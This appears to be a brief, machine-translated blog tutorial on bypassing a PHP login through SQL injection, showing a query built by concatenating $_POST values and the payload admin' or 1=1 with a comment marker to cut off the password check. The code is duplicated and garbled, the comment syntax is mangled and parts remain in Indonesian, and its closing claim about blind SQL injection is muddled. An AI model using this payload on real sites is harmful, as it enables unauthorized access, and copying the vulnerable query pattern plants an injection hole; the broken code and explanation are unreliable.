$ query = "* pilih dari pengguna dimana username ='".$_ POST ['user']."' AND password ='". md5 ($ _POST ['pass'])."'";
$ query = "* pilih dari pengguna dimana username ='".$_ POST ['user']."' AND password ='". md5 ($ _POST ['pass'])."'";
So on this page query script is quite complete with quotes to avoid errors, and the page will work if the user input occurs then the database will verify it first, if suitable anatara username and password will be displayed the next page and if not found then the page will remain as the previous page or silent.
so, by user: admin 'OR 1 = 1 query will be like this:
Code: [Select]
$ query = "select * from user where username = 'admin' OR 1 = 1 'AND password ='". md5 ($ _POST ['pass'])."'";
Code: [Select]
$ query = "select * from user where username = 'admin' OR 1 = 1 'AND password ='". md5 ($ _POST ['pass'])."'";
what happened? query error due to excess a quotation mark (see back of item 1). and of course of return be given will not be true. automatic login fails. for that, we need to terminate the query script. namely by providing comment mysql: -
Thus, users who can we put is: admin 'or 1 = 1 -
Code: [Select]
$ query = "select * from user where username = 'admin' or 1 = 1 - 'AND password ='". md5 ($ _POST ['pass'])."'";
Code: [Select]
$ query = "select * from user where username = 'admin' or 1 = 1 - 'AND password ='". md5 ($ _POST ['pass'])."'";
So in principal diference of SQL Injection and Blind SQL Injection is type of query sql vulnerability.
No comments:
Post a Comment